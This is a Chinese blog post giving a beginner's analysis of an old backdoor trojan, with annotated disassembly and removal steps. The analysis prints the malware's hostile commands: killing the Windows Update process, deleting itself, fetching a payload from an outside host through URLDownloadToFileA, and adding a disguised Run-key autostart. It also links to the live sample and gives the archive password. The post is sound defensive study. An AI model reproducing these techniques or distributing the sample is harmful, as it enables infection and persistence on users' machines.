一个后门木马的简单分析

菜鸟第一次分析，求大牛指点

下载链接：http://www.cnblogs.com/Joy7/admin/Files.aspx 名字：原样本  解压密码：JoyChou

病毒描述：

运行样本过后，首先病毒提升自身权限

在windows根目录下面生成一个sa.exe目录，并且设置改目录属性为隐藏只读

然后调用cmd和taskkill结束wuauclt.exe进程(Wuauclt.exe是Windows自动升级管理程序,该进程会不断在线检测更新,删除该进程将使计算机无法得到最新更新信息)

接着判断病毒的进程是否来自C:\WINDOWS\Fonts\wuauclt.exe，

如果不是就将病毒原样本拷贝到C:\WINDOWS\Fonts目录下,并且改名为wuauclt.exe（伪装为Windows自动升级管理程序）

如果是则加载系统动态库文件“urlmon.dll”，并调用该库里的"URLDownloadToFileA"函数，连接网络下载病毒文件并保存到C:\WINDOWS\Fonts\gern.fon目录下，

比较该目录文件是否存在，如果不存在则弹出一个消息框退出，如存在则创建多个线程，创建注册表启动项。

行为分析：

1、病毒运行后，会释放以下文件

C:WINDOWS\Fonts\wuauclt.exe

C:WINDOWS\Fonts\gern.fon

2、修改注册表

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run\360safe
值: 字符串: "C:\WINDOWS\Fonts\wuauclt.exe"
描述：添加病毒启动项

3、用命令行“cmd /c taskkill /im wuauclt.exe /f”结束“wuauclt.exe”Windows自动升级管理程序进程，被启动后的病毒判断自身进程路径是否来自“\fonts\wuauclt.exe”目录下，如不是则重新创建、如是加载系统动态库文件“urlmon.dll”，并调用该库里的"URLDownloadToFileA"函数，连接网络：http://360.1s.fr/ps.jpg下载病毒文件并保存到"C:\WINDOWS\Fonts\gern.fon"字体库目录下。

4、比较C:\WINDOWS\Fonts\gern.fon该目录文件是否存在，如果不存在则弹出标题为“http”内存为“qq935623508”的消息框然后退出，如果存在则修改注册表并添加开机启动项。

具体分析：

首先：该病毒加了一个UPX的壳，esp定律脱了就是了（好久没脱壳了，差点都不会了，=_=）

提升病毒自身权限
0040214D    E8 7EF4FFFF     call unpack.004015D0                                 ; //F7进入如下

004015D3    FF15 54304000   call dword ptr ds:[<&kernel32.GetCurrentProcess>]    ; 获取当前病毒进程
004015D9    8D4C24 00       lea ecx,dword ptr ss:[esp]
004015DD    51              push ecx
004015DE    6A 28           push 0x28
004015E0    50              push eax                                             ; 返回的进程伪句柄
004015E1    FF15 10304000   call dword ptr ds:[<&advapi32.OpenProcessToken>]     ; advapi32.OpenProcessToken
004015E7    85C0            test eax,eax
004015E9    74 49           je short unpack.00401634
004015EB    8D5424 08       lea edx,dword ptr ss:[esp+0x8]
004015EF    52              push edx
004015F0    68 E47C4000     push unpack.00407CE4                                 ; ASCII "SeDebugPrivilege"
004015F5    6A 00           push 0x0
004015F7    FF15 14304000   call dword ptr ds:[<&advapi32.LookupPrivilegeValueA>>; advapi32.LookupPrivilegeValueA
004015FD    85C0            test eax,eax
004015FF    74 28           je short unpack.00401629
00401601    8B4C24 00       mov ecx,dword ptr ss:[esp]                           ; unpack.00402152
00401605    6A 00           push 0x0
00401607    6A 00           push 0x0
00401609    8D4424 0C       lea eax,dword ptr ss:[esp+0xC]
0040160D    6A 00           push 0x0
0040160F    50              push eax
00401610    6A 00           push 0x0
00401612    51              push ecx
00401613    C74424 1C 01000>mov dword ptr ss:[esp+0x1C],0x1
0040161B    C74424 28 02000>mov dword ptr ss:[esp+0x28],0x2
00401623    FF15 18304000   call dword ptr ds:[<&advapi32.AdjustTokenPrivileges>>; advapi32.AdjustTokenPrivileges
00401629    8B5424 00       mov edx,dword ptr ss:[esp]                           ; unpack.00402152
0040162D    52              push edx
0040162E    FF15 A0304000   call dword ptr ds:[<&kernel32.CloseHandle>]          ; kernel32.CloseHandle
00401634    83C4 14         add esp,0x14
00401637    C3              retn

//判断病毒自身进程路径是否来自“\fonts\wuauclt.exe”目录下

00402172    FF15 7C304000   call dword ptr ds:[<&kernel32.GetWindows>; 获取windows的目录即C:\WINDOWS
00402178    BF 047D4000     mov edi,unpack.00407D04                  ; ASCII "\Fonts\wuauclt.exe"
0040217D    83C9 FF         or ecx,-0x1
00402180    33C0            xor eax,eax
00402182    8D95 5CFEFFFF   lea edx,dword ptr ss:[ebp-0x1A4]
00402188    F2:AE           repne scas byte ptr es:[edi]
0040218A    F7D1            not ecx
0040218C    2BF9            sub edi,ecx
0040218E    68 687F4000     push unpack.00407F68                     ; ont 即 font文件夹里面的ont，比较用的
00402193    8BF7            mov esi,edi                              ; ntdll.7C930228
00402195    8BD9            mov ebx,ecx
00402197    8BFA            mov edi,edx                              ; ntdll.KiFastSystemCallRet
00402199    83C9 FF         or ecx,-0x1
0040219C    F2:AE           repne scas byte ptr es:[edi]
0040219E    8BCB            mov ecx,ebx
004021A0    4F              dec edi                                  ; ntdll.7C930228
004021A1    C1E9 02         shr ecx,0x2
004021A4    F3:A5           rep movs dword ptr es:[edi],dword ptr ds>
004021A6    8BCB            mov ecx,ebx
004021A8    8D85 54FCFFFF   lea eax,dword ptr ss:[ebp-0x3AC]
004021AE    83E1 03         and ecx,0x3
004021B1    50              push eax
004021B2    F3:A4           rep movs byte ptr es:[edi],byte ptr ds:[>
004021B4    E8 27030000     call unpack.004024E0                     ; 判断自身进程路径是否来自“C:WINDOWS\fonts\wuauclt.exe”目录下
004021B9    83C4 08         add esp,0x8
004021BC    85C0            test eax,eax
004021BE    0F84 DA010000   je unpack.0040239E                       ; 如果不是，则跳转。如果是则跳转

如果不是来自C:WINDOWS\Fonts\wuauclt.exe，则跳转，重新创建
0040239E    68 307F4000     push unpack.00407F30                     ; 路径C:\sa.exe
004023A3    E8 4E020000     call unpack.004025F6                     ; 创建C:\sa.exe目录
004023A8    8B35 88304000   mov esi,dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep
004023AE    83C4 04         add esp,0x4
004023B1    6A 64           push 0x64
004023B3    FFD6            call esi
004023B5    6A 03           push 0x3                                 ; 属性为：READONLY|HIDDEN
004023B7    68 307F4000     push unpack.00407F30                     ; ASCII "C:\sa.exe"
004023BC    FF15 9C304000   call dword ptr ds:[<&kernel32.SetFileAtt>; 设置文件夹属性为隐藏
004023C2    8B1D 28304000   mov ebx,dword ptr ds:[<&kernel32.WinExec>; kernel32.WinExec
004023C8    6A 00           push 0x0
004023CA    68 0C7F4000     push unpack.00407F0C                     ; ASCII "cmd /c taskkill /im wuauclt.exe /f"
004023CF    FFD3            call ebx                                 ; 调用cmd和taskkill，结束wuauclt.exe进程
004023D1    68 D0070000     push 0x7D0
004023D6    FFD6            call esi
004023D8    8D8D 5CFEFFFF   lea ecx,dword ptr ss:[ebp-0x1A4]
004023DE    6A 00           push 0x0                                 ; 判断病毒的进程是否来自C:\WINDOWS\Fonts\wuauclt.exe
004023E0    8D95 54FCFFFF   lea edx,dword ptr ss:[ebp-0x3AC]
004023E6    51              push ecx                                 ; 复制后的文件：C:\WINDOWS\Fonts\wuauclt.exe
004023E7    52              push edx                                 ; 病毒源文件
004023E8    FF15 50304000   call dword ptr ds:[<&kernel32.CopyFileA>>; 将病毒源文件拷贝到C:\WINDOWS\Fonts\wuauclt.exe
004023EE    68 A00F0000     push 0xFA0
004023F3    FFD6            call esi
004023F5    8D85 5CFEFFFF   lea eax,dword ptr ss:[ebp-0x1A4]
004023FB    6A 00           push 0x0
004023FD    50              push eax
004023FE    FFD3            call ebx                                 ; 运行wuauclt.exe
00402400    B9 18000000     mov ecx,0x18
00402405    33C0            xor eax,eax
00402407    8DBD 61FFFFFF   lea edi,dword ptr ss:[ebp-0x9F]
0040240D    C685 60FFFFFF 0>mov byte ptr ss:[ebp-0xA0],0x0
00402414    F3:AB           rep stos dword ptr es:[edi]
00402416    66:AB           stos word ptr es:[edi]
00402418    AA              stos byte ptr es:[edi]
00402419    BF 007F4000     mov edi,unpack.00407F00                  ; ASCII "cmd /c del "
0040241E    83C9 FF         or ecx,-0x1
00402421    33C0            xor eax,eax
00402423    8D95 60FFFFFF   lea edx,dword ptr ss:[ebp-0xA0]
00402429    F2:AE           repne scas byte ptr es:[edi]
0040242B    F7D1            not ecx
0040242D    2BF9            sub edi,ecx
0040242F    8BC1            mov eax,ecx
00402431    8BF7            mov esi,edi                              ; ntdll.7C930228
00402433    8BFA            mov edi,edx                              ; ntdll.KiFastSystemCallRet
00402435    C1E9 02         shr ecx,0x2
00402438    F3:A5           rep movs dword ptr es:[edi],dword ptr ds>
0040243A    8BC8            mov ecx,eax
0040243C    83E1 03         and ecx,0x3
0040243F    F3:A4           rep movs byte ptr es:[edi],byte ptr ds:[>
00402441    FF15 4C304000   call dword ptr ds:[<&kernel32.GetCommand>; kernel32.GetCommandLineA
00402447    8BF8            mov edi,eax
00402449    83C9 FF         or ecx,-0x1
0040244C    33C0            xor eax,eax
0040244E    8D95 60FFFFFF   lea edx,dword ptr ss:[ebp-0xA0]
00402454    F2:AE           repne scas byte ptr es:[edi]
00402456    F7D1            not ecx
00402458    2BF9            sub edi,ecx
0040245A    50              push eax
0040245B    8BF7            mov esi,edi                              ; ntdll.7C930228
0040245D    8BFA            mov edi,edx                              ; ntdll.KiFastSystemCallRet
0040245F    8BD1            mov edx,ecx
00402461    83C9 FF         or ecx,-0x1
00402464    F2:AE           repne scas byte ptr es:[edi]
00402466    8BCA            mov ecx,edx                              ; ntdll.KiFastSystemCallRet
00402468    4F              dec edi                                  ; ntdll.7C930228
00402469    C1E9 02         shr ecx,0x2
0040246C    F3:A5           rep movs dword ptr es:[edi],dword ptr ds>
0040246E    8BCA            mov ecx,edx                              ; ntdll.KiFastSystemCallRet
00402470    8D85 60FFFFFF   lea eax,dword ptr ss:[ebp-0xA0]
00402476    83E1 03         and ecx,0x3
00402479    50              push eax                                 ; cmd /c del "原样本路径"
0040247A    F3:A4           rep movs byte ptr es:[edi],byte ptr ds:[>
0040247C    FFD3            call ebx                                 ; 调用cmd，删除自身

如果来自C:WINDOWS\Fonts\wuauclt.exe，则修改注册表，创建多线程
004021C4    33C9            xor ecx,ecx
004021C6    8D55 EC         lea edx,dword ptr ss:[ebp-0x14]
004021C9    894D ED         mov dword ptr ss:[ebp-0x13],ecx
004021CC    52              push edx
004021CD    894D F1         mov dword ptr ss:[ebp-0xF],ecx
004021D0    68 B87D4000     push unpack.00407DB8                           ; ASCII "khbced$Zbb"
004021D5    894D F5         mov dword ptr ss:[ebp-0xB],ecx
004021D8    C645 EC 00      mov byte ptr ss:[ebp-0x14],0x0
004021DC    894D F9         mov dword ptr ss:[ebp-0x7],ecx
004021DF    66:894D FD      mov word ptr ss:[ebp-0x3],cx
004021E3    884D FF         mov byte ptr ss:[ebp-0x1],cl
004021E6    E8 25F1FFFF     call unpack.00401310                           ; 解密urlmon.dll（khbced$Zbb依次+A）
004021EB    83C4 08         add esp,0x8
004021EE    90              nop　　//省略很多nop00402216    8D45 EC         lea eax,dword ptr ss:[ebp-0x14]
00402219    50              push eax
0040221A    FF15 38304000   call dword ptr ds:[<&kernel32.LoadLibraryA>]   ; 加载urlmon.dll
00402220    8BD8            mov ebx,eax
00402222    B9 09000000     mov ecx,0x9
00402227    33C0            xor eax,eax
00402229    8D7D C5         lea edi,dword ptr ss:[ebp-0x3B]
0040222C    C645 C4 00      mov byte ptr ss:[ebp-0x3C],0x0
00402230    C685 60FFFFFF 0>mov byte ptr ss:[ebp-0xA0],0x0
00402237    F3:AB           rep stos dword ptr es:[edi]
00402239    66:AB           stos word ptr es:[edi]
0040223B    AA              stos byte ptr es:[edi]
0040223C    B9 18000000     mov ecx,0x18
00402241    33C0            xor eax,eax
00402243    8DBD 61FFFFFF   lea edi,dword ptr ss:[ebp-0x9F]
00402249    F3:AB           rep stos dword ptr es:[edi]
0040224B    66:AB           stos word ptr es:[edi]
0040224D    8D4D C4         lea ecx,dword ptr ss:[ebp-0x3C]
00402250    51              push ecx
00402251    68 A47D4000     push unpack.00407DA4                           ; ASCII "KHB:emdbeWZJe<_b[7"
00402256    AA              stos byte ptr es:[edi]
00402257    E8 B4F0FFFF     call unpack.00401310                           ; 解密URLDownLoadTofileA字符串
0040225C    83C4 08         add esp,0x8
0040225F    8D55 C4         lea edx,dword ptr ss:[ebp-0x3C]
00402262    52              push edx
00402263    53              push ebx
00402264    FF15 34304000   call dword ptr ds:[<&kernel32.GetProcAddress>] ; 得到urlmon.dll中函数URLDownLoadTofileA的地址
0040226A    A3 D88C4000     mov dword ptr ds:[0x408CD8],eax                ; 将地址赋给全局变量0x408CD8
0040226F    8D85 58FDFFFF   lea eax,dword ptr ss:[ebp-0x2A8]
00402275    68 04010000     push 0x104
0040227A    50              push eax
0040227B    FF15 7C304000   call dword ptr ds:[<&kernel32.GetWindowsDirect>; kernel32.GetWindowsDirectoryA
00402281    BF D47C4000     mov edi,unpack.00407CD4                        ; ASCII "\Fonts\gern.fon"
00402286    83C9 FF         or ecx,-0x1
00402289    33C0            xor eax,eax
0040228B    8D95 58FDFFFF   lea edx,dword ptr ss:[ebp-0x2A8]
00402291    F2:AE           repne scas byte ptr es:[edi]
00402293    F7D1            not ecx
00402295    2BF9            sub edi,ecx
00402297    8BF7            mov esi,edi
00402299    8BFA            mov edi,edx
0040229B    8BD1            mov edx,ecx
0040229D    83C9 FF         or ecx,-0x1
004022A0    F2:AE           repne scas byte ptr es:[edi]
004022A2    8BCA            mov ecx,edx
004022A4    4F              dec edi
004022A5    C1E9 02         shr ecx,0x2
004022A8    F3:A5           rep movs dword ptr es:[edi],dword ptr ds:[esi]
004022AA    8BCA            mov ecx,edx
004022AC    8D85 60FFFFFF   lea eax,dword ptr ss:[ebp-0xA0]
004022B2    83E1 03         and ecx,0x3
004022B5    50              push eax
004022B6    F3:A4           rep movs byte ptr es:[edi],byte ptr ds:[esi]
004022B8    68 507F4000     push unpack.00407F50                           ; ASCII "^jjf0%%),&$'i$\h%fi$`f]"
004022BD    E8 4EF0FFFF     call unpack.00401310                           ; 解密http://360.1s.fr/ps.jpg字符串
004022C2    83C4 08         add esp,0x8
004022C5    8D8D 58FDFFFF   lea ecx,dword ptr ss:[ebp-0x2A8]               ; C:\WINDOWS\Fonts\gern.fon
004022CB    8D95 60FFFFFF   lea edx,dword ptr ss:[ebp-0xA0]                ; http://360.1s.fr/ps.jpg
004022D1    6A 00           push 0x0
004022D3    6A 00           push 0x0
004022D5    51              push ecx                                       ; 下载后保存的文件名
004022D6    52              push edx                                       ; 要下载的url地址
004022D7    6A 00           push 0x0
004022D9    FF15 D88C4000   call dword ptr ds:[0x408CD8]                   ; 调用URLDownloadToFileA函数
                                        但是这个病毒已经很久了，链接已经失效
004022DF    68 10270000     push 0x2710
004022E4    FF15 88304000   call dword ptr ds:[<&kernel32.Sleep>]          ; kernel32.Sleep
004022EA    53              push ebx
004022EB    FF15 30304000   call dword ptr ds:[<&kernel32.FreeLibrary>]    ; 释放urlmon.dll
004022F1    8D85 58FDFFFF   lea eax,dword ptr ss:[ebp-0x2A8]
004022F7    50              push eax
004022F8    FF15 2C304000   call dword ptr ds:[<&kernel32.GetFileAttribute>; 获取C:\WINDOWS\Fonts\gern.fon文件夹属性
004022FE    83F8 FF         cmp eax,-0x1                                   ; 判断C:\WINDOWS\Fonts\gern.fon是否存在
00402301    6A 00           push 0x0
00402303    75 1E           jnz short unpack.00402323                      ; 存在则跳转
00402305    68 487F4000     push unpack.00407F48                           ; ASCII "http"
0040230A    68 3C7F4000     push unpack.00407F3C                           ; ASCII "qq935623508"
0040230F    6A FF           push -0x1
00402311    FF15 B0304000   call dword ptr ds:[<&user32.MessageBoxA>]      ; user32.MessageBoxA

在C:\WINDOWS\Fonts里不能右键新建，这里我通过cmd命令，cd  C:\WINDOWS\Fonts  ;md gern.fon; cd gern.fon;
这样就创建成功了，不过还是在Fonts文件夹里看不到，这里我们crtl+F搜索下，就发现了这个文件夹~~


创建多线程
00402323    8B35 58304000   mov esi,dword ptr ds:[<&kernel32.CreateThread>]       ; kernel32.CreateThread
00402329    6A 00           push 0x0
0040232B    6A 00           push 0x0
0040232D    68 801F4000     push unpack.00401F80
00402332    6A 00           push 0x0
00402334    6A 00           push 0x0
00402336    FFD6            call esi                                              ; kernel32.CreateThread
00402338    6A 00           push 0x0
0040233A    6A 00           push 0x0
0040233C    6A 00           push 0x0
0040233E    68 301C4000     push unpack.00401C30
00402343    6A 00           push 0x0
00402345    6A 00           push 0x0
00402347    FFD6            call esi                                              ; kernel32.CreateThread
00402349    6A 00           push 0x0
0040234B    6A 00           push 0x0
0040234D    6A 00           push 0x0
0040234F    68 F0194000     push unpack.004019F0
00402354    6A 00           push 0x0
00402356    6A 00           push 0x0
00402358    FFD6            call esi                                              ; kernel32.CreateThread
0040235A    6A 00           push 0x0
0040235C    6A 00           push 0x0
0040235E    6A 00           push 0x0
00402360    68 40164000     push unpack.00401640
00402365    6A 00           push 0x0
00402367    6A 00           push 0x0
00402369    FFD6            call esi                                              ; kernel32.CreateThread
0040236B    6A 00           push 0x0
0040236D    6A 00           push 0x0
0040236F    6A 00           push 0x0
00402371    68 50174000     push unpack.00401750
00402376    6A 00           push 0x0
00402378    6A 00           push 0x0
0040237A    FFD6            call esi                                              ; kernel32.CreateThread
0040237C    6A 00           push 0x0
0040237E    6A 00           push 0x0
00402380    6A 00           push 0x0
00402382    68 701D4000     push unpack.00401D70
00402387    6A 00           push 0x0
00402389    6A 00           push 0x0
0040238B    FFD6            call esi                                              ; kernel32.CreateThread
0040238D    E8 CEF2FFFF     call unpack.00401660                                  ; 添加病毒启动项
00402392    5F              pop edi                                               ; ntdll.7C930228
00402393    5E              pop esi                                               ; ntdll.7C930228
00402394    B8 01000000     mov eax,0x1
00402399    5B              pop ebx                                               ; ntdll.7C930228
0040239A    8BE5            mov esp,ebp
0040239C    5D              pop ebp                                               ; ntdll.7C930228
0040239D    C3              retn

添加病毒启动项
00401660    81EC 08010000   sub esp,0x108
00401666    8D4424 00       lea eax,dword ptr ss:[esp]
0040166A    50              push eax
0040166B    68 247D4000     push unpack.00407D24                                  ; ASCII "Software\Microsoft\Windows\CurrentVersion\policies"
00401670    68 02000080     push 0x80000002
00401675    FF15 20304000   call dword ptr ds:[<&advapi32.RegOpenKeyA>]           ; advapi32.RegOpenKeyA
0040167B    85C0            test eax,eax
0040167D    0F85 B7000000   jnz unpack.0040173A
00401683    8B5424 00       mov edx,dword ptr ss:[esp]                            ; unpack.00402392
00401687    53              push ebx                                              ; urlmon.78130000
00401688    8B1D 04304000   mov ebx,dword ptr ds:[<&advapi32.RegCreateKeyA>]      ; 打开注册表Software\Microsoft\Windows\CurrentVersion\policies\explorer
0040168E    55              push ebp
0040168F    56              push esi                                              ; kernel32.CreateThread
00401690    8D4C24 0C       lea ecx,dword ptr ss:[esp+0xC]
00401694    57              push edi
00401695    51              push ecx                                              ; kernel32.7C8106A3
00401696    68 187D4000     push unpack.00407D18                                  ; ASCII "explorer"
0040169B    52              push edx                                              ; ntdll.KiFastSystemCallRet
0040169C    FFD3            call ebx                                              ; urlmon.78130000
0040169E    8B2D 08304000   mov ebp,dword ptr ds:[<&advapi32.RegCloseKey>]        ; advapi32.RegCloseKey
004016A4    85C0            test eax,eax
004016A6    74 07           je short unpack.004016AF
004016A8    8B4424 10       mov eax,dword ptr ss:[esp+0x10]
004016AC    50              push eax
004016AD    FFD5            call ebp
004016AF    8D4C24 14       lea ecx,dword ptr ss:[esp+0x14]
004016B3    68 04010000     push 0x104
004016B8    51              push ecx                                              ; kernel32.7C8106A3
004016B9    FF15 7C304000   call dword ptr ds:[<&kernel32.GetWindowsDirectoryA>]  ; kernel32.GetWindowsDirectoryA
004016BF    BF 047D4000     mov edi,unpack.00407D04                               ; ASCII "\Fonts\wuauclt.exe"
004016C4    83C9 FF         or ecx,-0x1
004016C7    33C0            xor eax,eax
004016C9    8D5424 14       lea edx,dword ptr ss:[esp+0x14]
004016CD    F2:AE           repne scas byte ptr es:[edi]
004016CF    F7D1            not ecx                                               ; kernel32.7C8106A3
004016D1    2BF9            sub edi,ecx                                           ; kernel32.7C8106A3
004016D3    8BF7            mov esi,edi
004016D5    8BFA            mov edi,edx                                           ; ntdll.KiFastSystemCallRet
004016D7    8BD1            mov edx,ecx                                           ; kernel32.7C8106A3
004016D9    83C9 FF         or ecx,-0x1
004016DC    F2:AE           repne scas byte ptr es:[edi]
004016DE    8BCA            mov ecx,edx                                           ; ntdll.KiFastSystemCallRet
004016E0    4F              dec edi
004016E1    C1E9 02         shr ecx,0x2
004016E4    F3:A5           rep movs dword ptr es:[edi],dword ptr ds:[esi]
004016E6    8BCA            mov ecx,edx                                           ; ntdll.KiFastSystemCallRet
004016E8    8D4424 10       lea eax,dword ptr ss:[esp+0x10]
004016EC    83E1 03         and ecx,0x3
004016EF    50              push eax
004016F0    F3:A4           rep movs byte ptr es:[edi],byte ptr ds:[esi]
004016F2    8B4C24 14       mov ecx,dword ptr ss:[esp+0x14]
004016F6    68 007D4000     push unpack.00407D00                                  ; ASCII "run"
004016FB    51              push ecx                                              ; kernel32.7C8106A3
004016FC    FFD3            call ebx                                              ; 新建注册表Software\Microsoft\Windows\CurrentVersion\policies\run
004016FE    8D7C24 14       lea edi,dword ptr ss:[esp+0x14]
00401702    83C9 FF         or ecx,-0x1
00401705    33C0            xor eax,eax
00401707    8D5424 14       lea edx,dword ptr ss:[esp+0x14]
0040170B    F2:AE           repne scas byte ptr es:[edi]
0040170D    F7D1            not ecx                                               ; kernel32.7C8106A3
0040170F    51              push ecx                                              ; kernel32.7C8106A3
00401710    52              push edx                                              ; ntdll.KiFastSystemCallRet
00401711    6A 01           push 0x1
00401713    50              push eax
00401714    8B4424 20       mov eax,dword ptr ss:[esp+0x20]
00401718    68 F87C4000     push unpack.00407CF8                                  ; 新建项为360safe
0040171D    50              push eax                                              ; 值为C:\WINDOWS\Fonts\wuauclt.exe
0040171E    FF15 0C304000   call dword ptr ds:[<&advapi32.RegSetValueExA>]        ; 添加病毒启动项
00401724    85C0            test eax,eax
00401726    74 07           je short unpack.0040172F
00401728    8B4C24 10       mov ecx,dword ptr ss:[esp+0x10]
0040172C    51              push ecx                                              ; kernel32.7C8106A3
0040172D    FFD5            call ebp
0040172F    8B5424 10       mov edx,dword ptr ss:[esp+0x10]
00401733    52              push edx                                              ; ntdll.KiFastSystemCallRet
00401734    FFD5            call ebp
00401736    5F              pop edi                                               ; unpack.00402392
00401737    5E              pop esi                                               ; unpack.00402392
00401738    5D              pop ebp                                               ; unpack.00402392
00401739    5B              pop ebx                                               ; unpack.00402392
0040173A    81C4 08010000   add esp,0x108
00401740    C3              retn

清除方案：

 

首先用杀软360杀毒

貌似不怎么有用

强行删除病毒文件

C:\WINDOWS\Fonts\gern.fon

C:\WINDOWS\Fonts\wuauclt.exe

C:\WINDOWS\sa.exe

删除注册表

HKLM\Software\Microsoft\Windows\CurrentVersion\policies\run\360safe

PS:第一次分析就分析了一个后门的木马，确实很菜很新手很不会，而且还有很多应该还没分析完，以后应该多用IDA分析，OD分析太慢了，忘大牛指点，我也正在学习。